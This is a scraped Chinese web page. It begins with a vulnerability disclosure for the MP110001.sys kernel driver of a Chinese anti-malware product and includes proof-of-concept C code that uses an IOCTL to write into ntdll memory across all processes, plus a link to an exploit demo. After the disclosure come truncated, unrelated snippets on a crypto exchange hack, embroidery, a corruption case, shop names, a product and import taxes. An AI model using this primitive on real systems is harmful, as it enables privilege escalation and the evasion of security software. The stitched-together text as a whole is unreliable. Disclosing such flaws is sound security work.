微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。 其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。 出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505该驱动提供了一个接口,允许RING3程序将一块数据COPY到地址0-0x80000000的任意 地址,在写入时会将寄存器CR0的第16位置0,此时CPU的页保护机制就会失效,WINDOWS NT 的CopyOnWrite机制也将失效,RING3程序可以将内存写入到系统模块,例如kernel32.dll, user32.dll的地址,改写它们的代码,此时对系统DLL代码的改写会在所有进程体内同时生效. 通过这一接口,任何权限的RING3程序就可以HOOK或旁路系统任何进程的函数调用,从而进行权限提升,如果HOOK进主动防御、防火墙等的进程体内,则可绕过主动防御软件的保护。 测试代码:HANDLE hdev = CreateFile("\\\\.\\MP110001" ,FILE_READ_ATTRIBUTES ,FILE_SHARE_READ |FILE_SHARE_WRITE ,0,OPEN_EXISTING ,0,0); if (hdev == INVALID_HANDLE_VALUE){ CHAR xx[100];sprintf(xx , "create err = %u\n" , GetLastError());MessageBox(xx, 0 , 0 );return ;} CHAR xx[] = "hello mp!"; HMODULE p = GetModuleHandle("ntdll.dll"); ULONG btr ; BOOL bret = DeviceIoControl(hdev ,0x220007,(PVOID)((ULONG)p + 2 ),strlen(xx)+1 ,xx,0,&btr ,0); CloseHandle(hdev); 测试代码会向NTDLL.DLL的DOS头第二个字节开始写入一个字符串“hello mp",此修改将在系统任何进程体内生效,可使用OD、WINDBG,WINHEX等工具查看 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下LOCALexp_MP.rar
这次攻击产生“黑客+金融”割韭菜式攻击,交易所是黑客攻击的重灾区,建议用户最好把虚拟币存储在本地钱包,但是这对普通用户的技术水平有一定要求,用户教育成本较高。 本文共计2937字,阅读时间8分...
京绣——针尖上的宫廷艺术它是燕京八绝之一,与景泰蓝、雕漆、宫毯、金漆镶嵌相比,它与皇帝更为亲近,皇帝曾身着由这门技艺做出的龙袍君临天下。它就是被称为燕京八绝之一的京绣。 京绣又称“宫绣”或“宫廷绣”,...
今年5月,江苏扬州市国资委原主任黄道龙一审被判贪污罪及受贿罪,其儿子黄宇也于7月因涉嫌非法经营罪在仪征市法院受审。两人案发系被黄宇前女友王燕茹实名举报巨额财产来源不明。 2018年2月底,扬州市政府...
免费两个字带艺字店肆取名一个字带艺字店肆名字大全 单糖带艺字旗舰店肆 俄、算、美 门派带艺字官方店肆 矛、桃、篷 墙角带艺字官方店肆 囊、疾、脂 夙嫌带艺字直销店肆 ...
想到RJ600N外观设计炫酷十足。该商品外观设计以多种多样倾斜度作为衔接,令该商品底端显著内缩,顶端则选用倾斜度的设计方案,总体的流线形设计方案,让其充满了速度感。而灰黑色与银白色的的配搭,不但考...
今起实施新税法海外购免税政策时期结束 最少進口跨境电子商务征收率11.9%发展。 今日起(2016年4月8日) ,跨境电商网络技术零售進口税款将执行最新政策。先前,一部分能够享有免征额的产品,将来...